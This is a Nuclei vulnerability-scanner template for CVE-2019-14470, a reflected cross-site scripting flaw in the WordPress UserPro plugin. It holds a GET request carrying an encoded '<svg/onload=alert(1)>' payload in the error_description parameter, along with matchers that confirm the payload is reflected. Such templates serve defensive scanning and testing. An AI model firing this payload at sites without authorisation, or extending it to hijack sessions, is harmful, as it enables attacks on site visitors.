nuclei-templates/http/cves/2019/CVE-2019-14470.yaml

52 lines
2.1 KiB
YAML

id: CVE-2019-14470
info:
name: WordPress UserPro 4.9.32 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of UserPro or apply the provided patch to fix the XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
- http://packetstormsecurity.com/files/154206/WordPress-UserPro-4.9.32-Cross-Site-Scripting.html
- https://wpvulndb.com/vulnerabilities/9815
- https://nvd.nist.gov/vuln/detail/CVE-2019-14470
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-14470
cwe-id: CWE-79
epss-score: 0.80616
epss-percentile: 0.98012
cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: instagram-php-api_project
product: instagram-php-api
tags: wordpress,xss,wp-plugin,wpscan,packetstorm,cve,cve2019,instagram-php-api_project
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(1)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402204ff2146bcf661e0d4cccbaae514d89cdb7f8928389fcd5289191afc3b1b6d13a02206bbf3280abafe6f898034c28455e4fd278d7f23abc2c9bc6de975d7c31271306:922c64590222798bb761d5b6d8e72950